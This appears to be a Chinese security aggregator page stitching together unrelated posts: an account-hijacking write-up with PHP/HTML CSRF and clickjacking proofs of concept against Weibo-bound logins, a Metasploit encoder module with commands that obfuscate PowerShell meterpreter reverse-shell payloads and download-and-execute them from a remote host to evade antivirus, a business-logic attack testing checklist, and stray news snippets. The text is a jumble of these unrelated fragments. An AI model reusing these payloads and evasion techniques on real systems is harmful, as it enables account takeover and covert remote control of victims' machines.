Aggregator

前言

这是一个理论上通杀很多大型企业网站的漏洞缺陷~

可能很多朋友点击来看见标题就觉得，这家伙在吹牛逼了我倒要看看这货能怎么吹,CSRF之登陆我的账号能有啥玩意危害？

先按奈住你心中不屑的情绪，听我慢慢道来~

通用业务功能分析

最近很喜欢挖一些通用漏洞（不是程序通用，而是功能通用），会经常拿着BAT三家以及其他一些大型网站进行业务功能点的对比，来看看有哪些是共用的功能点，这边列出以下的几条：

1. QQ快捷登陆
2. 微信快捷登陆
3. 微博快捷登陆
4. 其他……

OAuth2.0认证缺陷-快捷登陆账号劫持的问题具体可以参考：http://gh0st.cn/archives/2018-02-12/1 （来自i春秋社区）

这种问题其实需要一定的运气因为很多的快捷登陆有state参数的干扰，所以是完全没办法去利用的。

在这里我尝试能不能挖到一个新的缺陷，在走正常的快捷登陆流程时我发现需要绑定这个网站的账号才可以正常的使用用户的功能，这时候反着想网站的用户中心是否有第三方的账号绑定？

这里找了大部分的网站都有这样的功能（第三方账号绑定，绑定了即可使用第三方账号直接登陆），找到了这个功能点就可以来测试，先走一遍正常的绑定流程：

• 点击绑定第三方账号
• 进入第三方账号绑定页面
• （如果第三方账号是登陆状态）->需要点击授权按钮；(如果第三方账号是未登陆状态)->需要输入第三方的账号密码登陆->点击授权按钮

设立猜想

梳理了流程之后，一个很骚的思路就从脑子里蹦了出来：

有第三方账号绑定这个功能，登陆处也有第三方账号登陆功能，也就是说绑定第三方账号代表着权限分享给了第三方账号。

猜想建立->如果我有第三方账号所在网站的CSRF之你登陆我的账号缺陷，让受害者先登陆我的第三方账号（为了避免损失，我可以注册一个小号），然后绑定处也有CSRF绑定的缺陷或者点击劫持问题，那么我就可以让受害者绑定我的第三方账号，然后根据我的第三方账号来登陆受害者的账号，劫持到其权限。

验证猜想 流程

个人中心有这个第三方的账号绑定：

在这里QQ、github、微博、微信四个第三方账号绑定中我有了微博的CSRF之你登陆我的账号这个缺陷，所以这里测试下微博的第三方账号绑定。

页面有微博账号绑定的跳转链接：

通过这个链接进入了绑定的界面（未登陆微博）：

通过这个链接进入了绑定的界面（已登陆微博）：

当我授权绑定之后，微博发生了变化，管理中心->我的应用->我的应用：

会多出这个网站在里面，那么这个变化是对我们有利的，还是？

这里我解绑了微博，然后再使用这个已经授权了的微博进行绑定，发现居然不用点击授权了，直接就绑定了。

很显然，在这里这个便利解决了一些攻击的利用难度。

实现

我们现在具备的几个条件：

1. 微博的CSRF之你登陆我的账号缺陷：

登陆你的微博，然后访问http://login.sina.com.cn/sso/crossdomain.php?action=login，会返回这样的内容给你：

其中arrURL对应的链接就是凭证登陆的~

1. 你的微博已经授权过了要存在缺陷的网站(这里方便直接跳转而不用再去点击按钮！所以你可以先用自己的微博绑定下存在缺陷的网站的账号，然后解绑就行了~)
2. 绑定请求存在csrf的缺陷（这里因为是GET请求类型 /oauth/weibo/redirect，而一般不会对GET请求类型进行CSRF的限制~~）

场景1.攻击步骤：

对方点开凭证链接登陆了你的微博，对方点开绑定微博的链接，绑定了你的微博，完成攻击。

考虑到凭证时效性的问题，在这里写了一个动态的PoC：

<?php //get weibo login token $curl = curl_init(); $cookie = "你微博的Cookie"; curl_setopt($curl, CURLOPT_URL, 'http://login.sina.com.cn/sso/crossdomain.php?action=login'); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_COOKIE, $cookie); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($curl); curl_close($curl); //echo $data; $t = preg_match('/ticket=(.*?)&sso/', $data, $res); $url = "https://passport.weibo.com/wbsso/login?ticket={$res[1]}&ssosavestate=1556602678"; ?> <html> <head> <style type="text/css"> .testframe { height: 100%; } iframe { height: 100%; width: 100%; border: 0; margin: 0; padding: 0; /*控制不透明度的属性，兼容各大浏览器*/ filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/ -moz-opacity: 0; /*提供给火狐浏览器的*/ -webkit-opacity: 0; /*提供给webkit内核的*/ -khtml-opacity: 0; /*提供给KHTML内核的*/ -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; /*提供给IE8之后的*/ opacity: 0; /*控制不透明度的属性，兼容各大浏览器*/ } </style> </head> <body> <div class="testframe"> <iframe id="test0" src="<?php echo $url;?>"></iframe> </div> <script> function loadsrc(){ document.getElementById("test0").src="https://gh0st.cn/oauth/weibo/redirect"; } setTimeout("loadsrc()",2000); </script> </body> </html> 场景2.攻击步骤：

有些网站可能是post请求限制了referer或者根本没有跳转的请求而是直接进入了微博的绑定界面，因为state参数的原因导致根本无法以这个绑定页面为链接的形式去做攻击~

可能有很多朋友就有疑问了，为什么我老是提到state参数？这个参数是干什么用的呢？这里参考下微博的OAuth2.0接口的开发文档：

http://open.weibo.com/wiki/Oauth2/authorize

是防止CSRF的，也就是说在这里如果绑定的链接是如下这样子的：

没有state参数验证的，那么你可以直接以此作为绑定链接，覆盖场景1中PoC里面的这个链接:https://gh0st.cn/oauth/weibo/redirect

好了，说了那么多跟场景2没用的话，切入主题来说说场景2的情况到底该如何完成攻击？

很简单我们可以使用点击劫持来完成攻击，如下动态的PoC：

<?php //get weibo login token $curl = curl_init(); $cookie = "你微博的Cookie"; curl_setopt($curl, CURLOPT_URL, 'http://login.sina.com.cn/sso/crossdomain.php?action=login'); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_COOKIE, $cookie); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($curl); curl_close($curl); //echo $data; $t = preg_match('/ticket=(.*?)&sso/', $data, $res); $url = "https://passport.weibo.com/wbsso/login?ticket={$res[1]}&ssosavestate=1556602678"; ?> <html> <head> <style type="text/css"> .testframe { height: 100%; } iframe { height: 100%; width: 100%; border: 0; margin: 0; padding: 0; /*控制不透明度的属性，兼容各大浏览器*/ filter: alpha(Opacity=0); /*提供给IE浏览器8之前的*/ -moz-opacity: 0; /*提供给火狐浏览器的*/ -webkit-opacity: 0; /*提供给webkit内核的*/ -khtml-opacity: 0; /*提供给KHTML内核的*/ -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)"; /*提供给IE8之后的*/ opacity: 0; /*控制不透明度的属性，兼容各大浏览器*/ } .btn { position: fixed; width: 70px; height: 22px; left: 167px; right: 0; display:block; top: 295px; } </style> </head> <body> <div class="testframe"> <input type="button" class="btn" value="Click"> <iframe id="test0" src="<?php echo $url;?>"></iframe> </div> <script> function loadsrc(){ document.getElementById("test0").src="https://gh0st.cn/usercenter/ubind"; } setTimeout("loadsrc()",2000); </script> </body> </html>

简单的说明下这个PoC的用处：

总结

可能把每一项单独的拎出来会发现这并没有缺陷，但是一旦参与到了业务逻辑中，就一定会存在一定的问题。

不要看不起一个看似没危害的漏洞甚至一个缺陷，因为你永远不知道它能发挥的巨大危害。

       Windows PowerShell是以.NET Framework技术为基础，并且与现有的WSH保持向后兼容，因此它的脚本程序不仅能访问.NET CLR，也能使用现有的COM技术。同时也包含了数种系统管理工具、简易且一致的语法，提升管理者处理，常见如登录数据库、WMI。Exchange Server 2007以及System Center Operations Manager 2007等服务器软件都将内置Windows PowerShell。
      Windows PowerShell的强大，并且内置，在渗透过程中，也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell的一切行为。
      在https://technet.microsoft.com，看到文档如下：
Here is a listing of the available startup parameters:    -Command Specifies the command text to execute as though it were typed at the PowerShell command prompt.    -EncodedCommand Specifies the base64-encoded command text to execute.    -ExecutionPolicy Sets the default execution policy for the console session.    -File Sets the name of a script fi le to execute.    -InputFormat Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML.    -NoExit Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt (cmd.exe).    -NoLogo Starts the PowerShell console without displaying the copyright banner.    -Noninteractive Starts the PowerShell console in non-interactive mode. In this mode, PowerShell does not present an interactive prompt to the user.    -NoProfile Tells the PowerShell console not to load the current user’s profile.    -OutputFormat Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML.    -PSConsoleFile Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap-in extensions are loaded and available. You can create a console file using Export-Console in Windows PowerShell.    -Sta Starts PowerShell in single-threaded mode.    -Version Sets the version of Windows PowerShell to use for compatibility, such as 1.0.    -WindowStyle Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal. 

针对它的特性，本地测试：
1 Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Micropoor')



上文所说，越来越多的杀软开始对抗，powershell的部分行为，或者特征。以msfvenom为例，生成payload。

micropoor.ps1不幸被杀。

针对powershell特性，更改payload


接下来考虑的事情是如何把以上重复的工作变成自动化，并且针对powershell，DownloadString特性，设计出2种payload形式：
（1）目标机出网
（2）目标机不出网

并且根据需求，无缝连接Metasploit。

根据微软文档，可以找到可能对以上有帮助的属性，分别为：
WindowStyle
NoExit
EncodedCommand
exec

自动化实现如下：

#       copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell. #       E.g  #       msf encoder(powershell/base64) > use exploit/multi/handler  #       msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #       payload => windows/x64/meterpreter/reverse_tcp #       msf exploit(multi/handler) > exploit    #       msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.   #       [*] Started reverse TCP handler on xx.1xx.xx.xx:xx   class MetasploitModule < Msf::Encoder   Rank = NormalRanking     def initialize     super(       'Name'             => 'Powershell Base64 Encoder',       'Description'      => %q{         msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.       },       'Author'           => 'Micropoor',       'Arch'             => ARCH_CMD,       'Platform'         => 'win')       register_options([       OptBool.new('payload', [ false, 'Use payload ', false ]),       OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])     ])     end     def encode_block(state, buf)     base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))     cmd = ''     if datastore['x64']       cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '     else       cmd += 'powershell.exe '     end     if datastore['payload']       cmd += '-windowstyle hidden -exec bypass -NoExit '     end     cmd += "-EncodedCommand #{base64}"   end end     # if use caidao # execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows # xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.


copy powershell_base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.


参数 payload 选择是否使用Metasploit payload，来去掉powershell的关键字。

例1（目标出网，下载执行）：

echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/micropoor.ps1');\"" |msfvenom -e powershell/base64 --arch x64 --platform windows



例2（目标不出网，本地执行）



注：加payload参数
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=8080 -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows payload

更多有趣的实验：

把例1的down内容更改为例2，并且去掉payload参数。来减小payload大小。

更改Invoke-Mimikatz.ps1等。



tks
https://technet.microsoft.com/en-us/library/ff629472.aspx
https://github.com/danielbohannon/Invoke-Obfuscation

一年一度露肉季，给不动如山的你

让日志可视化管理更轻松

之前一直都是直接无脑

1from base64 import b64encode as b64e

只知道大概 base64 是啥东西, 今天突然心血来潮花了几分钟了解了下 base64, 其实原理并不复杂.

You can&rsquo;t assume that your third-party web apps are secure! You need to assess them yourself using this multi-step process.

Privacy today isn&rsquo;t just about staying away from prying eyes. The very act of communicating across the Internet with open, non-confidential protocols invites exposure to multiple threat types.

*本文首发阿里云先知安全技术社区，原文链接https://xz.aliyun.com/t/2212 前言： 2018年3月中旬，Twitter 用户 @Vitaly Nikolenko 发布消息，称 ubuntu 最新版本（Ubuntu 16.04）存在高危的本地提权漏洞，而且推文中还附上了 EXP

中兴遭美国制裁；三大运营商5G试点城市出炉；饿了么将测试新外卖无人机；大型客机自动降落应用程序首次在大型机场验飞成功；深圳发布首个区块链创投基金；Facebook拟更改用户条款；美国知名银行前员工或盗用150万客户信息

This article will analyze a UAF vulnerability in win32k Window Manager (User) Subsystem in Window...

来源:https://www.leavesongs.com/PHP/backshell-via-php.html 用到了，记录一下

让眼睛放松一下吧~

大吉大利，晚上吃鸡！

Throughout the year, security researchers submit some amazing work to us under the Microsoft Bug Bounty program. Starting this quarter, we want to give a shout out to and acknowledge the hard work and dedication of the following individuals and companies who have contributed to securing Microsoft’s products and services over our third quarter (January-March 2018).

Fun Fact #2: the author is looking forward to being a card-carrying Singaporean crime fighter (temporarily) someday.

这篇文章将分析 Windows 操作系统 win32k 内核模块窗口管理器子系统中的 CVE-2015-2546 漏洞，与上一篇分析的 CVE-2017-0263 漏洞类似地，这个漏洞也是弹出菜...

快上车，带你认识小图标！

首先感谢朋友倾璇的邀请 http://payloads.online/archivers/2018-03-21/1 ，参与了的相关撰写，目前负责业务逻辑测试这一块的撰写，目前初步已经成型，先发出来让大家看看，欢迎点评，也可以加入我们一起来撰写~

业务逻辑测试

介绍：这里对Web应用业务逻辑方面的安全缺陷进行介绍和常见案例讲解。

任意用户密码重置 常见的缺陷 * 1.验证码类缺陷

-场景： 1.1 验证码回显在客户端(响应主体、Set-Cookie等等…)。

1.2 验证码过于简易时效性过长，接口未做限制(一般为纯数字4-8位数，时效性长达30分钟以上可以对验证码进行枚举)。

* 2.未校验权限/前端校验/越权

-场景： 2.1 任意手机号验证码都可重置任意账号。

2.2 修改响应包的主体(根据实际情况来修改 例如验证请求对应的响应报文的主体为false 你可以修改为true)。

2.3 同一浏览器进入A用户的重置，然后关闭再进入B用户的重置 而实际上重置A用户。

2.4 修改重置密码的相关参数(例如 userid等等…)。

* 3.HOST头伪造

-场景： 3.1 在邮箱找回密码的时候，可以简单替换Host部分进行Fuzz，看看找回密码的链接中的域名是否是根据Host来生成的如果是可以替换成自己的域名。但是这种思路很鸡肋，因为需要用户的点击，这样才可以根据日志看到重置密码的链接，万一重置密码的链接时效性过去就无奈了。

* 4.找回密码的凭证脆弱

-场景： 4.1 见过最多的是找回密码的token是base64编码的，而解码后的明文根据其规则修改就可以成为别人用户找回密码的凭证了。

验证码绕过 常见的缺陷 图形类验证码绕过 * 1.图形验证码可复用

-场景： 3.1 验证码刷新之后，而历史刷新的验证码还是可以继续使用。

3.2 验证码使用过后不刷新，时效性不过期，可以一直复用。

* 2.图形验证码易识别

-场景 4.1 很多验证码的显示很简单，容易被机器识别。

短信类验证码绕过 * 1.验证码过于简易&接口未限制

-场景： 1.1 有些手机短信验证码都为 4-8位 纯数字的验证码，在接口没有任何限制的情况下是可以直接爆破的。

* 2.验证码发送复用&时效性过长&接口未限制

-场景： 2.1 6位数验证码时效性为5分钟，但是在这里同一手机号发送的验证码都是一样的，所以可以在4分钟的时候重新发送一次验证码这样验证码就又有效了，因为验证码一直在被复用，所以可以爆破。

* 3.万能验证码

-场景： 3.1 这是很多大企业的诟病，在未上线前为了方便测试加了888888、000000这样的万能验证码但是上线后没去删除测试的内容导致被恶意利用。

短信/语音验证码重放

无论是发送短信还是语音验证码来做验证，都是需要手机号的，而发送验证码实际上是需要成本的，需要跟运营商或者是第三方验证码平台进行合作，多数验证码为0.01元一条，当然也有更便宜的，所以这边的问题也会影响到一个企业的资产方面。

常见缺陷 * 1.无限制发送

-场景： 1.1 厂商对验证码发送这一块并没有进行限制时间发送

* 2.代码层逻辑校验问题

-场景： 2.1 很多厂商会对手机号进行限制，如果60秒内发送过就不会发送，但是程序员在设计代码层的逻辑时会出现很多奇葩的问题，例如其为了方便用户体验，正常的代码层的流程为：

a.去除用户手误输入的空格以及一些特殊符号

b.验证手机号是否发送过验证码

某些程序员会这样设计流程：

a.验证手机号是否发送过验证码（发送过则不放行 没发送过则进入下一步）

b.去除用户手误输入的空格以及一些特殊符号

c.发送手机号验证码

* 3.手机号可遍历发送

-场景： 3.1 我之前有提到验证码发送会影响到企业资产，那么发送验证码限制就不能仅仅针对于单一手机号的限制，例如我可以载入一堆手机号的字典，然后直接遍历发送验证码，这也是危害之一。

业务流程绕过 常见缺陷 * 1.无验证步骤跳跃

-场景： 1.1 出现的场景很多：密码重置步骤、支付步骤，对于这种的测试方法有很多中：

a.对比法，使用A、B两个账号，A账号先正常走一遍流程，然后记录流程的请求报文跟响应报文，使用B账号来测试是否能绕过直接进入最后一步骤。

b.第六感，假设步骤1的网址为:http://www.test.com/step1，这时候你可以凭借你的第六感修改下链接为/step2之类的来测试。

加密算法脆弱 常见缺陷 * 1.前端呈现加密算法代码

-场景： 1.1 很多厂商算法写的很好，可没用，因为他用的是JS代码，在前端会直接能看见，而尝试跟踪JS的代码就会知道是怎么加密的从而可以直接绕过。

* 2.算法脆弱，明文可判断

-场景： 2.1 这是一个看运气的问题，一段密文为md5的，这时候你要做好自己的分析明文到底是什么，然后去碰撞，例如可能是md5(用户名+邮箱)这样的的组合。

支付逻辑漏洞 常见缺陷 * 1.金额修改

-场景： 1.1 支付的过程中有很多涉及金额的元素可以修改运费、优惠价、折扣等，可以修改为负数金额也可以修改金额为小于原金额的数进行测试，有时候会遇到溢出，你修改金额为较大的数看你会出现只支付1元的情况。

* 2.数量修改

-场景： 2.1 修改购买物品的数量为小数或者负数，同上，有时候会遇到溢出，你修改数量为较大的数看你会出现只支付1元的情况。

* 3.sign值可逆

-场景： 3.1 这是一个看运气的问题，sign多数为对比确认金额的一段内容，很多都是md5加密的，这时候你要做好自己的分析明文到底是什么，然后去碰撞，例如可能是md5(订单号+金额)这样的的组合，然后修改金额重新生成sign就可以绕过金额固定的限制了。

条件竞争(HTTP并发) 常见缺陷 * 1.条件竞争（HTTP并发）

-场景： 1.1 在签到、转账、兑换、购买等场景是最容易出现这样的问题，而并发测试的方法可以使用Fiddler也可以使用BurpSuite Intruder模块。

这里例举下Fiddler测试方法（BurpSuite测试很简单就不说明了）：

配置好代理，设置好拦截：

然后点击兑换、转账、签到等最后一步按钮的时候会抓到一个请求，右键这一请求然后按住Shift点击Replay->Reissue Requests：

填入要重发的次数：

一般为20即可，然后点击GO放行：

最后看你自己来判断是否存在并发的问题，例如签到，如果存在那么肯定是签到天数或者签到所获得的奖励会一下子有很多，也可以看Fiddler中的响应报文结果。

The Domain Name System (DNS) is the cornerstone of communication for the internet. Navigating to the sites you access every day often starts with a DNS request. Cybercriminals recognize the value of DNS and may look for ways to abuse improperly secured DNS to compromise its uptime, integrity or overall response efficacy—which makes DNS an […]

The post DNS-Based Threats: Cache Poisoning appeared first on Verisign Blog.